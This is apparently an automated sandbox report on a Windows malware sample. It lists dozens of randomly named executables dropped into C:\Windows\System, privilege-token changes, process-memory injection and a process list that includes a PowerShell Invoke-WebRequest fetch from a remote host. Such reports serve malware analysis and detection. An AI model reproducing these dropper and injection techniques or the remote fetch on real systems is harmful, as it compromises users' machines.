File created C:\Windows\System\HBnOsPZ.exe C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe N/A
File created C:\Windows\System\sBrqxle.exe C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe N/A
File created C:\Windows\System\OQzLWBA.exe C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe N/A
File created C:\Windows\System\MtYsEVN.exe C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe N/A
File created C:\Windows\System\biLMJqJ.exe C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe N/A
File created C:\Windows\System\KJQETXa.exe C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe N/A
File created C:\Windows\System\vwUVCro.exe C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe N/A
File created C:\Windows\System\wKplsTe.exe C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe N/A
File created C:\Windows\System\TdNBcNr.exe C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe N/A
File created C:\Windows\System\xhTyxXl.exe C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe N/A
File created C:\Windows\System\GLgrHsl.exe C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe N/A
File created C:\Windows\System\QCOwPyB.exe C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe N/A
File created C:\Windows\System\joCqCjJ.exe C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe N/A
File created C:\Windows\System\cJJRLLB.exe C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe N/A
File created C:\Windows\System\HSscxfT.exe C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe N/A
File created C:\Windows\System\PraoPKF.exe C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe N/A
File created C:\Windows\System\JEYVQbt.exe C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe N/A
File created C:\Windows\System\UvqXClX.exe C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe N/A
File created C:\Windows\System\jIjztAJ.exe C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe N/A
File created C:\Windows\System\YMYuOQP.exe C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe N/A
File created C:\Windows\System\mtGBWiP.exe C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe N/A
File created C:\Windows\System\EGLKfkw.exe C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe N/A
File created C:\Windows\System\KfifOzb.exe C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe N/A
File created C:\Windows\System\imGuTyI.exe C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe N/A
File created C:\Windows\System\iFwzIsZ.exe C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe N/A
File created C:\Windows\System\YHxcLKK.exe C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe N/A
File created C:\Windows\System\ZlDGkHC.exe C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe N/A
File created C:\Windows\System\cyIIzQv.exe C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe N/A
File created C:\Windows\System\ECbDPFc.exe C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe N/A
File created C:\Windows\System\RNekDRP.exe C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe N/A
File created C:\Windows\System\LPNejfi.exe C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe N/A
File created C:\Windows\System\mrLOhpM.exe C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2272 wrote to memory of 4088 N/A C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2272 wrote to memory of 4088 N/A C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2272 wrote to memory of 1720 N/A C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe C:\Windows\System\gqRpmmZ.exe
PID 2272 wrote to memory of 1720 N/A C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe C:\Windows\System\gqRpmmZ.exe
PID 2272 wrote to memory of 4212 N/A C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe C:\Windows\System\UySOCYI.exe
PID 2272 wrote to memory of 4212 N/A C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe C:\Windows\System\UySOCYI.exe
PID 2272 wrote to memory of 4844 N/A C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe C:\Windows\System\xqdMkKZ.exe
PID 2272 wrote to memory of 4844 N/A C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe C:\Windows\System\xqdMkKZ.exe
PID 2272 wrote to memory of 2984 N/A C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe C:\Windows\System\UJkJjQw.exe
PID 2272 wrote to memory of 2984 N/A C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe C:\Windows\System\UJkJjQw.exe
PID 2272 wrote to memory of 2784 N/A C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe C:\Windows\System\CIKkDbp.exe
PID 2272 wrote to memory of 2784 N/A C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe C:\Windows\System\CIKkDbp.exe
PID 2272 wrote to memory of 4228 N/A C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe C:\Windows\System\jKKmQGD.exe
PID 2272 wrote to memory of 4228 N/A C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe C:\Windows\System\jKKmQGD.exe
PID 2272 wrote to memory of 1652 N/A C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe C:\Windows\System\mBjWSPJ.exe
PID 2272 wrote to memory of 1652 N/A C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe C:\Windows\System\mBjWSPJ.exe
PID 2272 wrote to memory of 1268 N/A C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe C:\Windows\System\BiNUTgB.exe
PID 2272 wrote to memory of 1268 N/A C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe C:\Windows\System\BiNUTgB.exe
PID 2272 wrote to memory of 1696 N/A C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe C:\Windows\System\RBDSzcv.exe
PID 2272 wrote to memory of 1696 N/A C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe C:\Windows\System\RBDSzcv.exe
PID 2272 wrote to memory of 4728 N/A C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe C:\Windows\System\iFwzIsZ.exe
PID 2272 wrote to memory of 4728 N/A C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe C:\Windows\System\iFwzIsZ.exe
PID 2272 wrote to memory of 4604 N/A C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe C:\Windows\System\WmuOIPa.exe
PID 2272 wrote to memory of 4604 N/A C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe C:\Windows\System\WmuOIPa.exe
PID 2272 wrote to memory of 4440 N/A C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe C:\Windows\System\alnrRld.exe
PID 2272 wrote to memory of 4440 N/A C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe C:\Windows\System\alnrRld.exe
PID 2272 wrote to memory of 2816 N/A C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe C:\Windows\System\EIjlViE.exe
PID 2272 wrote to memory of 2816 N/A C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe C:\Windows\System\EIjlViE.exe
PID 2272 wrote to memory of 3708 N/A C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe C:\Windows\System\BZTzxwR.exe
PID 2272 wrote to memory of 3708 N/A C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe C:\Windows\System\BZTzxwR.exe
PID 2272 wrote to memory of 4308 N/A C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe C:\Windows\System\KlyogXL.exe
PID 2272 wrote to memory of 4308 N/A C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe C:\Windows\System\KlyogXL.exe
PID 2272 wrote to memory of 548 N/A C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe C:\Windows\System\DqXWifd.exe
PID 2272 wrote to memory of 548 N/A C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe C:\Windows\System\DqXWifd.exe
PID 2272 wrote to memory of 2740 N/A C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe C:\Windows\System\REAiWIb.exe
PID 2272 wrote to memory of 2740 N/A C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe C:\Windows\System\REAiWIb.exe
PID 2272 wrote to memory of 1320 N/A C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe C:\Windows\System\WunfKWr.exe
PID 2272 wrote to memory of 1320 N/A C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe C:\Windows\System\WunfKWr.exe
PID 2272 wrote to memory of 2764 N/A C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe C:\Windows\System\tZwFJue.exe
PID 2272 wrote to memory of 2764 N/A C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe C:\Windows\System\tZwFJue.exe
PID 2272 wrote to memory of 1392 N/A C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe C:\Windows\System\ZLIawkm.exe
PID 2272 wrote to memory of 1392 N/A C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe C:\Windows\System\ZLIawkm.exe
PID 2272 wrote to memory of 4128 N/A C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe C:\Windows\System\oEanhxH.exe
PID 2272 wrote to memory of 4128 N/A C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe C:\Windows\System\oEanhxH.exe
PID 2272 wrote to memory of 4252 N/A C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe C:\Windows\System\aBsZZRm.exe
PID 2272 wrote to memory of 4252 N/A C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe C:\Windows\System\aBsZZRm.exe
PID 2272 wrote to memory of 2076 N/A C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe C:\Windows\System\MDEDqAo.exe
PID 2272 wrote to memory of 2076 N/A C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe C:\Windows\System\MDEDqAo.exe
PID 2272 wrote to memory of 2172 N/A C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe C:\Windows\System\nieXFrU.exe
PID 2272 wrote to memory of 2172 N/A C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe C:\Windows\System\nieXFrU.exe
PID 2272 wrote to memory of 3904 N/A C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe C:\Windows\System\hJCvsMp.exe
PID 2272 wrote to memory of 3904 N/A C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe C:\Windows\System\hJCvsMp.exe
PID 2272 wrote to memory of 1556 N/A C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe C:\Windows\System\lGVECJQ.exe
PID 2272 wrote to memory of 1556 N/A C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe C:\Windows\System\lGVECJQ.exe
PID 2272 wrote to memory of 4976 N/A C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe C:\Windows\System\eHyOepf.exe
PID 2272 wrote to memory of 4976 N/A C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe C:\Windows\System\eHyOepf.exe
PID 2272 wrote to memory of 864 N/A C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe C:\Windows\System\kTOovsA.exe
PID 2272 wrote to memory of 864 N/A C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe C:\Windows\System\kTOovsA.exe
PID 2272 wrote to memory of 2000 N/A C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe C:\Windows\System\fVQucNi.exe
PID 2272 wrote to memory of 2000 N/A C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe C:\Windows\System\fVQucNi.exe
PID 2272 wrote to memory of 3132 N/A C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe C:\Windows\System\joCqCjJ.exe
PID 2272 wrote to memory of 3132 N/A C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe C:\Windows\System\joCqCjJ.exe
PID 2272 wrote to memory of 2112 N/A C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe C:\Windows\System\XzYGkhv.exe
PID 2272 wrote to memory of 2112 N/A C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe C:\Windows\System\XzYGkhv.exe

Processes

C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe

"C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "

C:\Windows\System\gqRpmmZ.exe

C:\Windows\System\gqRpmmZ.exe

C:\Windows\System\UySOCYI.exe

C:\Windows\System\UySOCYI.exe

C:\Windows\System\xqdMkKZ.exe

C:\Windows\System\xqdMkKZ.exe

C:\Windows\System\UJkJjQw.exe

C:\Windows\System\UJkJjQw.exe

C:\Windows\System\CIKkDbp.exe

C:\Windows\System\CIKkDbp.exe

C:\Windows\System\jKKmQGD.exe

C:\Windows\System\jKKmQGD.exe

C:\Windows\System\mBjWSPJ.exe

C:\Windows\System\mBjWSPJ.exe

C:\Windows\System\BiNUTgB.exe

C:\Windows\System\BiNUTgB.exe

C:\Windows\System\RBDSzcv.exe

C:\Windows\System\RBDSzcv.exe

C:\Windows\System\iFwzIsZ.exe

C:\Windows\System\iFwzIsZ.exe

C:\Windows\System\WmuOIPa.exe

C:\Windows\System\WmuOIPa.exe

C:\Windows\System\alnrRld.exe

C:\Windows\System\alnrRld.exe

C:\Windows\System\EIjlViE.exe

C:\Windows\System\EIjlViE.exe

C:\Windows\System\BZTzxwR.exe

C:\Windows\System\BZTzxwR.exe

C:\Windows\System\KlyogXL.exe

C:\Windows\System\KlyogXL.exe

C:\Windows\System\DqXWifd.exe

C:\Windows\System\DqXWifd.exe

C:\Windows\System\REAiWIb.exe

C:\Windows\System\REAiWIb.exe

C:\Windows\System\WunfKWr.exe

C:\Windows\System\WunfKWr.exe

C:\Windows\System\tZwFJue.exe

C:\Windows\System\tZwFJue.exe

C:\Windows\System\ZLIawkm.exe

C:\Windows\System\ZLIawkm.exe

C:\Windows\System\oEanhxH.exe

C:\Windows\System\oEanhxH.exe

C:\Windows\System\aBsZZRm.exe

C:\Windows\System\aBsZZRm.exe

C:\Windows\System\MDEDqAo.exe

C:\Windows\System\MDEDqAo.exe

C:\Windows\System\nieXFrU.exe

C:\Windows\System\nieXFrU.exe

C:\Windows\System\hJCvsMp.exe

C:\Windows\System\hJCvsMp.exe

C:\Windows\System\lGVECJQ.exe

C:\Windows\System\lGVECJQ.exe

C:\Windows\System\eHyOepf.exe

C:\Windows\System\eHyOepf.exe

C:\Windows\System\kTOovsA.exe

C:\Windows\System\kTOovsA.exe

C:\Windows\System\fVQucNi.exe

C:\Windows\System\fVQucNi.exe

C:\Windows\System\joCqCjJ.exe

C:\Windows\System\joCqCjJ.exe

C:\Windows\System\XzYGkhv.exe

C:\Windows\System\XzYGkhv.exe

C:\Windows\System\tZWspQQ.exe

C:\Windows\System\tZWspQQ.exe

C:\Windows\System\VlUHuaA.exe

C:\Windows\System\VlUHuaA.exe

C:\Windows\System\UikOHuY.exe

C:\Windows\System\UikOHuY.exe

C:\Windows\System\jjVtwdV.exe

C:\Windows\System\jjVtwdV.exe

C:\Windows\System\cWZqtAn.exe

C:\Windows\System\cWZqtAn.exe

C:\Windows\System\VUJEZkl.exe

C:\Windows\System\VUJEZkl.exe

C:\Windows\System\QRCPxIP.exe

C:\Windows\System\QRCPxIP.exe

C:\Windows\System\TtuAQgO.exe

C:\Windows\System\TtuAQgO.exe

C:\Windows\System\WfNYMrk.exe

C:\Windows\System\WfNYMrk.exe

C:\Windows\System\iDiaDIZ.exe

C:\Windows\System\iDiaDIZ.exe

C:\Windows\System\iXVaBvK.exe

C:\Windows\System\iXVaBvK.exe

C:\Windows\System\udDzOId.exe

C:\Windows\System\udDzOId.exe

C:\Windows\System\QYIsdko.exe

C:\Windows\System\QYIsdko.exe

C:\Windows\System\nnpKrNc.exe

C:\Windows\System\nnpKrNc.exe

C:\Windows\System\dtazAvE.exe

C:\Windows\System\dtazAvE.exe

C:\Windows\System\aZXVnRp.exe

C:\Windows\System\aZXVnRp.exe

C:\Windows\System\PvYcesi.exe

C:\Windows\System\PvYcesi.exe

C:\Windows\System\lyeHDEt.exe

C:\Windows\System\lyeHDEt.exe

C:\Windows\System\uhUnYAN.exe

C:\Windows\System\uhUnYAN.exe

C:\Windows\System\cWgTsmK.exe

C:\Windows\System\cWgTsmK.exe

C:\Windows\System\ozuTckC.exe

C:\Windows\System\ozuTckC.exe

C:\Windows\System\HBnOsPZ.exe

C:\Windows\System\HBnOsPZ.exe

C:\Windows\System\avaYCus.exe

C:\Windows\System\avaYCus.exe

C:\Windows\System\hAzudfU.exe

C:\Windows\System\hAzudfU.exe

C:\Windows\System\MLVQkqJ.exe

C:\Windows\System\MLVQkqJ.exe

C:\Windows\System\oeHqGzs.exe

C:\Windows\System\oeHqGzs.exe

C:\Windows\System\HUAULgu.exe

C:\Windows\System\HUAULgu.exe

C:\Windows\System\lKXfAVy.exe

C:\Windows\System\lKXfAVy.exe

C:\Windows\System\UGRomCV.exe

C:\Windows\System\UGRomCV.exe

C:\Windows\System\jTcEAvh.exe

C:\Windows\System\jTcEAvh.exe

C:\Windows\System\WNgPivb.exe

C:\Windows\System\WNgPivb.exe

C:\Windows\System\tLMybnU.exe

C:\Windows\System\tLMybnU.exe

C:\Windows\System\YHxcLKK.exe

C:\Windows\System\YHxcLKK.exe

C:\Windows\System\JbLzkmZ.exe

C:\Windows\System\JbLzkmZ.exe

C:\Windows\System\ehUQsbN.exe

C:\Windows\System\ehUQsbN.exe

C:\Windows\System\PzLnAcW.exe

C:\Windows\System\PzLnAcW.exe

C:\Windows\System\utGRhjB.exe

C:\Windows\System\utGRhjB.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=3804,i,15140928051103392835,1612840580898364401,262144 --variations-seed-version --mojo-platform-channel-handle=4080 /prefetch:8

C:\Windows\System\JzaidgB.exe

C:\Windows\System\JzaidgB.exe

C:\Windows\System\DwwKHZF.exe

C:\Windows\System\DwwKHZF.exe

C:\Windows\System\yCscWAk.exe

C:\Windows\System\yCscWAk.exe

C:\Windows\System\ayRhbPZ.exe

C:\Windows\System\ayRhbPZ.exe

C:\Windows\System\DNhlIIW.exe

C:\Windows\System\DNhlIIW.exe

C:\Windows\System\ziOwOCU.exe

C:\Windows\System\ziOwOCU.exe

C:\Windows\System\vjUJQSC.exe

C:\Windows\System\vjUJQSC.exe

C:\Windows\System\RpIaFRZ.exe

C:\Windows\System\RpIaFRZ.exe

C:\Windows\System\cGMmNTx.exe

C:\Windows\System\cGMmNTx.exe

C:\Windows\System\NIYziFF.exe

C:\Windows\System\NIYziFF.exe

C:\Windows\System\TTKLxqH.exe

C:\Windows\System\TTKLxqH.exe

C:\Windows\System\goUJEKV.exe

C:\Windows\System\goUJEKV.exe

C:\Windows\System\BBufrhS.exe

C:\Windows\System\BBufrhS.exe

C:\Windows\System\jVloFTZ.exe

C:\Windows\System\jVloFTZ.exe

C:\Windows\System\zMDSFTf.exe

C:\Windows\System\zMDSFTf.exe

C:\Windows\System\xdorvCp.exe

C:\Windows\System\xdorvCp.exe

C:\Windows\System\MezYvKg.exe

C:\Windows\System\MezYvKg.exe

C:\Windows\System\eLyMHti.exe

C:\Windows\System\eLyMHti.exe

C:\Windows\System\RdvYujH.exe

C:\Windows\System\RdvYujH.exe

C:\Windows\System\CbdXXYq.exe

C:\Windows\System\CbdXXYq.exe

C:\Windows\System\cFlBlMg.exe

C:\Windows\System\cFlBlMg.exe

C:\Windows\System\GxrlDda.exe

C:\Windows\System\GxrlDda.exe

C:\Windows\System\yOLhYSd.exe

C:\Windows\System\yOLhYSd.exe

C:\Windows\System\YkYHHlo.exe

C:\Windows\System\YkYHHlo.exe

C:\Windows\System\yDwDCfd.exe

C:\Windows\System\yDwDCfd.exe

C:\Windows\System\sEQevmJ.exe

C:\Windows\System\sEQevmJ.exe

C:\Windows\System\jlkhXYC.exe

C:\Windows\System\jlkhXYC.exe

C:\Windows\System\IHMpQmA.exe

C:\Windows\System\IHMpQmA.exe

C:\Windows\System\Hcgdvmf.exe

C:\Windows\System\Hcgdvmf.exe

C:\Windows\System\pISFNlO.exe

C:\Windows\System\pISFNlO.exe

C:\Windows\System\AqXdEnM.exe

C:\Windows\System\AqXdEnM.exe

C:\Windows\System\DMhzGGN.exe

C:\Windows\System\DMhzGGN.exe

C:\Windows\System\BwLZVHV.exe

C:\Windows\System\BwLZVHV.exe

C:\Windows\System\KNuHjaw.exe

C:\Windows\System\KNuHjaw.exe

C:\Windows\System\wyNstfP.exe

C:\Windows\System\wyNstfP.exe

C:\Windows\System\pqAiFKF.exe

C:\Windows\System\pqAiFKF.exe

C:\Windows\System\wGQPVEa.exe

C:\Windows\System\wGQPVEa.exe

C:\Windows\System\YOJqlrk.exe

C:\Windows\System\YOJqlrk.exe

C:\Windows\System\cnZlQgX.exe

C:\Windows\System\cnZlQgX.exe

C:\Windows\System\TVqkzQy.exe

C:\Windows\System\TVqkzQy.exe

C:\Windows\System\TwKRnaf.exe

C:\Windows\System\TwKRnaf.exe

C:\Windows\System\KkDNbVB.exe

C:\Windows\System\KkDNbVB.exe

C:\Windows\System\cJJRLLB.exe

C:\Windows\System\cJJRLLB.exe

C:\Windows\System\NuTavod.exe

C:\Windows\System\NuTavod.exe

C:\Windows\System\HhrwSbr.exe

C:\Windows\System\HhrwSbr.exe

C:\Windows\System\OPBerAM.exe

C:\Windows\System\OPBerAM.exe

C:\Windows\System\KIXFjDn.exe

C:\Windows\System\KIXFjDn.exe

C:\Windows\System\KgMFSxY.exe

C:\Windows\System\KgMFSxY.exe

C:\Windows\System\wMfmQOd.exe

C:\Windows\System\wMfmQOd.exe

C:\Windows\System\MrLgvlw.exe

C:\Windows\System\MrLgvlw.exe

C:\Windows\System\KFfiCDt.exe

C:\Windows\System\KFfiCDt.exe

C:\Windows\System\OWwCGGM.exe

C:\Windows\System\OWwCGGM.exe

C:\Windows\System\PKKKEQQ.exe

C:\Windows\System\PKKKEQQ.exe

C:\Windows\System\tALIKiu.exe

C:\Windows\System\tALIKiu.exe

C:\Windows\System\GqmaoYa.exe

C:\Windows\System\GqmaoYa.exe

C:\Windows\System\MjERzce.exe

C:\Windows\System\MjERzce.exe

C:\Windows\System\tlUONcw.exe

C:\Windows\System\tlUONcw.exe

C:\Windows\System\wxnBADX.exe

C:\Windows\System\wxnBADX.exe

C:\Windows\System\YmnpGhv.exe

C:\Windows\System\YmnpGhv.exe

C:\Windows\System\gRxBjSC.exe

C:\Windows\System\gRxBjSC.exe

C:\Windows\System\tLxywwo.exe

C:\Windows\System\tLxywwo.exe

C:\Windows\System\uSSNSeQ.exe

C:\Windows\System\uSSNSeQ.exe

C:\Windows\System\fpBhcql.exe

C:\Windows\System\fpBhcql.exe

C:\Windows\System\cuEepsG.exe

C:\Windows\System\cuEepsG.exe

C:\Windows\System\RzZbDtH.exe

C:\Windows\System\RzZbDtH.exe

C:\Windows\System\nFLmxet.exe

C:\Windows\System\nFLmxet.exe

C:\Windows\System\TLfqtkP.exe

C:\Windows\System\TLfqtkP.exe

C:\Windows\System\xfQZEbb.exe

C:\Windows\System\xfQZEbb.exe

C:\Windows\System\ZkfEUUQ.exe

C:\Windows\System\ZkfEUUQ.exe

C:\Windows\System\XGOnZBV.exe

C:\Windows\System\XGOnZBV.exe

C:\Windows\System\lWoDElb.exe

C:\Windows\System\lWoDElb.exe

C:\Windows\System\wymggeE.exe

C:\Windows\System\wymggeE.exe

C:\Windows\System\XqxyKos.exe

C:\Windows\System\XqxyKos.exe

C:\Windows\System\yEqHisH.exe

C:\Windows\System\yEqHisH.exe

C:\Windows\System\XwiUdyX.exe

